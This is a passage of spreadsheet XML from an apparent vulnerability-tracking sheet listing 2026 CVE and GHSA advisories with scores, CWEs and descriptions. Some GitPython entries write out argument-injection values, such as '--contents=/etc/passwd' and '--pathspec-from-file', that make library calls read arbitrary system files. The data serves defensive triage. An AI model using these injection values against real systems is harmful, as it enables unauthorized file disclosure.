      <c r="G1320" s="5" t="inlineStr"/>
      <c r="H1320" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1320" s="5" t="inlineStr"/>
      <c r="J1320" s="5" t="inlineStr"/>
      <c r="K1320" s="5" t="inlineStr"/>
      <c r="L1320" s="5" t="inlineStr"/>
      <c r="M1320" s="5" t="inlineStr"/>
      <c r="N1320" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1320" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1320" s="5" t="inlineStr"/>
      <c r="Q1320" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1320" s="5" t="inlineStr">
        <is>
          <t>PX4 Autopilot through 1.17.0 contains a use-after-free vulnerability in the load_mon module's stop path where exit_and_cleanup() deletes the LoadMon object and frees the performance counter before perf_end() attempts to access it. Attackers can trigger this vulnerability by issuing the load_mon stop command from any PXH or MAVLink shell, causing reads and writes through freed memory that corrupt heap objects and destabilize the flight stack.</t>
        </is>
      </c>
      <c r="S1320" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86713</t>
        </is>
      </c>
    </row>
    <row r="1321">
      <c r="A1321" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1321" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1321" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86718</t>
        </is>
      </c>
      <c r="D1321" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1321" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1321" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1321" s="5" t="inlineStr"/>
      <c r="H1321" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1321" s="5" t="inlineStr"/>
      <c r="J1321" s="5" t="inlineStr"/>
      <c r="K1321" s="5" t="inlineStr"/>
      <c r="L1321" s="5" t="inlineStr"/>
      <c r="M1321" s="5" t="inlineStr"/>
      <c r="N1321" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1321" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1321" s="5" t="inlineStr"/>
      <c r="Q1321" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R1321" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a cross-site request forgery vulnerability in deleteHistory.json.php and finishAll.json.php that allows unauthenticated attackers to mutate live history by making GET requests without CSRF token validation. Attackers can craft malicious pages that trigger administrator browsers to delete all live transmission history or mark streams as finished when an admin visits the attacker-controlled site.</t>
        </is>
      </c>
      <c r="S1321" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86718</t>
        </is>
      </c>
    </row>
    <row r="1322">
      <c r="A1322" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1322" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1322" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86724</t>
        </is>
      </c>
      <c r="D1322" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1322" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1322" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1322" s="5" t="inlineStr"/>
      <c r="H1322" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1322" s="5" t="inlineStr"/>
      <c r="J1322" s="5" t="inlineStr"/>
      <c r="K1322" s="5" t="inlineStr"/>
      <c r="L1322" s="5" t="inlineStr"/>
      <c r="M1322" s="5" t="inlineStr"/>
      <c r="N1322" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1322" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1322" s="5" t="inlineStr"/>
      <c r="Q1322" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R1322"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S1322" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86724</t>
        </is>
      </c>
    </row>
    <row r="1323">
      <c r="A1323" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1323" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1323" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86725</t>
        </is>
      </c>
      <c r="D1323" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1323" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1323" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1323" s="5" t="inlineStr"/>
      <c r="H1323" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1323" s="5" t="inlineStr"/>
      <c r="J1323" s="5" t="inlineStr"/>
      <c r="K1323" s="5" t="inlineStr"/>
      <c r="L1323" s="5" t="inlineStr"/>
      <c r="M1323" s="5" t="inlineStr"/>
      <c r="N1323" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1323" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1323" s="5" t="inlineStr"/>
      <c r="Q1323" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R1323" s="5" t="inlineStr">
        <is>
          <t>AVideo through c3edcc274c389816d434acadac07ee78eaf330c1 contains a missing authorization vulnerability in the SocialMediaPublisher plugin's add.json.php endpoint that allows authenticated users to modify other users' OAuth token records. Attackers can supply arbitrary row IDs to overwrite another user's stored access_token and refresh_token, then delete the compromised record to destroy the victim's provider linkage.</t>
        </is>
      </c>
      <c r="S1323" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86725</t>
        </is>
      </c>
    </row>
    <row r="1324">
      <c r="A1324" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1324" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1324" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86734</t>
        </is>
      </c>
      <c r="D1324" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1324" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1324" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1324" s="5" t="inlineStr"/>
      <c r="H1324" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1324" s="5" t="inlineStr"/>
      <c r="J1324" s="5" t="inlineStr"/>
      <c r="K1324" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L1324" s="5" t="inlineStr"/>
      <c r="M1324" s="5" t="inlineStr"/>
      <c r="N1324" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1324" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1324" s="5" t="inlineStr"/>
      <c r="Q1324" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R1324"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S1324" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86734</t>
        </is>
      </c>
    </row>
    <row r="1325">
      <c r="A1325" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1325" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1325" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9331</t>
        </is>
      </c>
      <c r="D1325" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1325" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1325" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G1325" s="5" t="inlineStr"/>
      <c r="H1325" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1325" s="5" t="inlineStr"/>
      <c r="J1325" s="5" t="inlineStr"/>
      <c r="K1325" s="5" t="inlineStr"/>
      <c r="L1325" s="5" t="inlineStr"/>
      <c r="M1325" s="5" t="inlineStr"/>
      <c r="N1325" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1325" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1325" s="5" t="inlineStr"/>
      <c r="Q1325" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1325" s="5" t="inlineStr">
        <is>
          <t>The EDD Product Catalog Feed by PixelYourSite plugin for WordPress is vulnerable to unauthorized modification of data that can lead to a denial of service due to a missing capability check on the wpeddpcf_delete_feed function in all versions up to, and including, 1.0.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary option values on the WordPress site. This can be leveraged to delete an option that would create an error on the site and deny service to legitimate users.</t>
        </is>
      </c>
      <c r="S1325" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9331</t>
        </is>
      </c>
    </row>
    <row r="1326">
      <c r="A1326" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1326" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1326" s="5" t="inlineStr">
        <is>
          <t>GHSA-6rj2-96f5-chj9</t>
        </is>
      </c>
      <c r="D1326" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1326" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1326" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G1326" s="5" t="inlineStr"/>
      <c r="H1326" s="5" t="inlineStr"/>
      <c r="I1326" s="5" t="inlineStr"/>
      <c r="J1326" s="5" t="inlineStr"/>
      <c r="K1326" s="5" t="inlineStr"/>
      <c r="L1326" s="5" t="inlineStr">
        <is>
          <t>pip:GitPython</t>
        </is>
      </c>
      <c r="M1326" s="5" t="inlineStr"/>
      <c r="N1326" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O1326" s="5" t="inlineStr"/>
      <c r="P1326" s="5" t="inlineStr"/>
      <c r="Q1326" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="R1326" s="5" t="inlineStr">
        <is>
          <t>## Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-3wxw-xv34-2frg. This link is maintained to preserve external references.
## Original Description
GitPython before 3.1.59 contains an arbitrary file read vulnerability in TagReference.create() where a positional reference parameter bypasses the unsafe option guard. Attackers can supply a reference value like --file=&lt;path&gt; to read arbitrary files, with contents returned in the annotated tag message.</t>
        </is>
      </c>
      <c r="S1326" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-6rj2-96f5-chj9</t>
        </is>
      </c>
    </row>
    <row r="1327">
      <c r="A1327" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1327" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1327" s="5" t="inlineStr">
        <is>
          <t>GHSA-89ff-m8wv-p99r</t>
        </is>
      </c>
      <c r="D1327" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1327" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1327" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G1327" s="5" t="inlineStr"/>
      <c r="H1327" s="5" t="inlineStr"/>
      <c r="I1327" s="5" t="inlineStr"/>
      <c r="J1327" s="5" t="inlineStr"/>
      <c r="K1327" s="5" t="inlineStr"/>
      <c r="L1327" s="5" t="inlineStr">
        <is>
          <t>pip:gitpython</t>
        </is>
      </c>
      <c r="M1327" s="5" t="inlineStr"/>
      <c r="N1327" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O1327" s="5" t="inlineStr"/>
      <c r="P1327" s="5" t="inlineStr"/>
      <c r="Q1327" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="R1327" s="5" t="inlineStr">
        <is>
          <t>## Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-5xxx-qhh7-9287. This link is maintained to preserve external references.
## Original Description
GitPython versions before 3.1.59 contain an incomplete denylist in the unsafe_git_revision_options guard that omits --contents and -S options, allowing attackers to read arbitrary files by passing these options to Repo.blame(). Attackers can supply revision values like --contents=/etc/passwd to leak file contents through the blame result returned to the caller.</t>
        </is>
      </c>
      <c r="S1327" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-89ff-m8wv-p99r</t>
        </is>
      </c>
    </row>
    <row r="1328">
      <c r="A1328" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1328" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1328" s="5" t="inlineStr">
        <is>
          <t>GHSA-w672-239g-c3gr</t>
        </is>
      </c>
      <c r="D1328" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1328" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1328" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G1328" s="5" t="inlineStr"/>
      <c r="H1328" s="5" t="inlineStr"/>
      <c r="I1328" s="5" t="inlineStr"/>
      <c r="J1328" s="5" t="inlineStr"/>
      <c r="K1328" s="5" t="inlineStr"/>
      <c r="L1328" s="5" t="inlineStr">
        <is>
          <t>pip:gitpython</t>
        </is>
      </c>
      <c r="M1328" s="5" t="inlineStr"/>
      <c r="N1328" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O1328" s="5" t="inlineStr"/>
      <c r="P1328" s="5" t="inlineStr"/>
      <c r="Q1328" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="R1328" s="5" t="inlineStr">
        <is>
          <t>## Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-hh9p-6wh2-4mfc. This link is maintained to preserve external references.
## Original Description
GitPython versions before 3.1.58 fail to validate options passed to git rm and git checkout commands in IndexFile.remove() and Head.checkout(). Attackers can supply --pathspec-from-file and --pathspec-file-nul parameters to read arbitrary files accessible to the process, with full file contents returned in GitCommandError.stderr.</t>
        </is>
      </c>
      <c r="S1328" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-w672-239g-c3gr</t>
        </is>
      </c>
    </row>
    <row r="1329">
      <c r="A1329" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1329" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1329" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50349</t>
        </is>
      </c>
      <c r="D1329" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1329" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1329" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1329" s="5" t="inlineStr"/>
      <c r="H1329" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1329" s="5" t="inlineStr"/>
      <c r="J1329" s="5" t="inlineStr"/>
      <c r="K1329" s="5" t="inlineStr"/>
      <c r="L1329" s="5" t="inlineStr"/>
      <c r="M1329" s="5" t="inlineStr"/>
      <c r="N1329" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1329" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1329" s="5" t="inlineStr"/>
      <c r="Q1329" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="R1329" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1329" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50349</t>
        </is>
      </c>
    </row>
    <row r="1330">
      <c r="A1330" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1330" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1330" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58848</t>
        </is>
      </c>
      <c r="D1330" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1330" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1330" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1330" s="5" t="inlineStr"/>
      <c r="H1330" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1330" s="5" t="inlineStr"/>
      <c r="J1330" s="5" t="inlineStr"/>
      <c r="K1330" s="5" t="inlineStr"/>
      <c r="L1330" s="5" t="inlineStr"/>
      <c r="M1330" s="5" t="inlineStr"/>
      <c r="N1330" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1330" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1330" s="5" t="inlineStr"/>
      <c r="Q1330" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R1330" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of alloc.c, there is a possible unauthorized read/write access due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="S1330" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58848</t>
        </is>
      </c>
    </row>
    <row r="1331">
      <c r="A1331" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1331" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1331" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62653</t>
        </is>
      </c>
      <c r="D1331" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1331" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1331" s="5" t="inlineStr">
        <is>
          <t>productcert@siemens.com</t>
        </is>
      </c>
      <c r="G1331" s="5" t="inlineStr"/>
      <c r="H1331" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1331" s="5" t="inlineStr"/>
      <c r="J1331" s="5" t="inlineStr"/>
      <c r="K1331" s="5" t="inlineStr"/>
      <c r="L1331" s="5" t="inlineStr"/>
      <c r="M1331" s="5" t="inlineStr"/>
      <c r="N1331" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1331" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1331" s="5" t="inlineStr"/>
      <c r="Q1331" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R1331" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). The input received over a proprietary communication protocol that is exposed when the device is placed into a special firmware-update mode is not properly validated, resulting in a memory corruption condition. This could allow an unauthenticated attacker with physical access to the device to cause a crash and potentially execute arbitrary code on the device.</t>
        </is>
      </c>
      <c r="S1331" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62653</t>
        </is>
      </c>
    </row>
    <row r="1332">
      <c r="A1332" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1332" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1332" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62654</t>
        </is>
      </c>
      <c r="D1332" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1332" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1332" s="5" t="inlineStr">
        <is>
          <t>productcert@siemens.com</t>
        </is>
      </c>
      <c r="G1332" s="5" t="inlineStr"/>
      <c r="H1332" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1332" s="5" t="inlineStr"/>
      <c r="J1332" s="5" t="inlineStr"/>
      <c r="K1332" s="5" t="inlineStr"/>
      <c r="L1332" s="5" t="inlineStr"/>
      <c r="M1332" s="5" t="inlineStr"/>
      <c r="N1332" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1332" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1332" s="5" t="inlineStr"/>
      <c r="Q1332" s="5" t="inlineStr">
        <is>
          <t>CWE-494</t>
        </is>
      </c>
      <c r="R1332" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). A special maintenance mode can be activated via a physical key sequence during device boot, in which the device downloads and executes program code from a network server without verifying its authenticity or integrity. This could allow an attacker with physical access to the device to upload and execute arbitrary, unsigned code.</t>
        </is>
      </c>
      <c r="S1332" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62654</t>
        </is>
      </c>
    </row>
    <row r="1333">
      <c r="A1333" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1333" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1333" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62694</t>
        </is>
      </c>
      <c r="D1333" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1333" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1333" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1333" s="5" t="inlineStr"/>
      <c r="H1333" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1333" s="5" t="inlineStr"/>
      <c r="J1333" s="5" t="inlineStr"/>
      <c r="K1333" s="5" t="inlineStr"/>
      <c r="L1333" s="5" t="inlineStr"/>
      <c r="M1333" s="5" t="inlineStr"/>
      <c r="N1333" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1333" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1333" s="5" t="inlineStr"/>
      <c r="Q1333" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1333" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Installer allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1333" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62694</t>
        </is>
      </c>
    </row>
    <row r="1334">
      <c r="A1334" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1334" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1334" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62727</t>
        </is>
      </c>
      <c r="D1334" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1334" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1334" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1334" s="5" t="inlineStr"/>
      <c r="H1334" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1334" s="5" t="inlineStr"/>
      <c r="J1334" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K13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34" s="5" t="inlineStr"/>
      <c r="M1334" s="5" t="inlineStr"/>
      <c r="N1334" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1334" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="P1334" s="5" t="inlineStr"/>
      <c r="Q1334" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R1334" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Telephony Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1334" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62727</t>
        </is>
      </c>
    </row>
    <row r="1335">
      <c r="A1335" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1335" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1335" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68824</t>
        </is>
      </c>
      <c r="D1335" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1335" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1335" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1335" s="5" t="inlineStr"/>
      <c r="H1335" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1335" s="5" t="inlineStr"/>
      <c r="J1335" s="5" t="inlineStr"/>
      <c r="K1335" s="5" t="inlineStr"/>
      <c r="L1335" s="5" t="inlineStr"/>
      <c r="M1335" s="5" t="inlineStr"/>
      <c r="N1335" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1335" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1335" s="5" t="inlineStr"/>
      <c r="Q1335" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="R1335" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Connected User Experiences and Telemetry allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1335" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68824</t>
        </is>
      </c>
    </row>
    <row r="1336">
      <c r="A1336" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1336" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1336" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68825</t>
        </is>
      </c>
      <c r="D1336" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1336" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1336" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1336" s="5" t="inlineStr"/>
      <c r="H1336" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1336" s="5" t="inlineStr"/>
      <c r="J1336" s="5" t="inlineStr"/>
      <c r="K1336" s="5" t="inlineStr"/>
      <c r="L1336" s="5" t="inlineStr"/>
      <c r="M1336" s="5" t="inlineStr"/>
      <c r="N1336" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1336" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1336" s="5" t="inlineStr"/>
      <c r="Q1336" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1336" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Bind Filter Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1336" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68825</t>
        </is>
      </c>
    </row>
    <row r="1337">
      <c r="A1337" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1337" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1337" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68837</t>
        </is>
      </c>
      <c r="D1337" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1337" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1337" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1337" s="5" t="inlineStr"/>
      <c r="H1337" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1337" s="5" t="inlineStr"/>
      <c r="J1337" s="5" t="inlineStr"/>
      <c r="K1337" s="5" t="inlineStr"/>
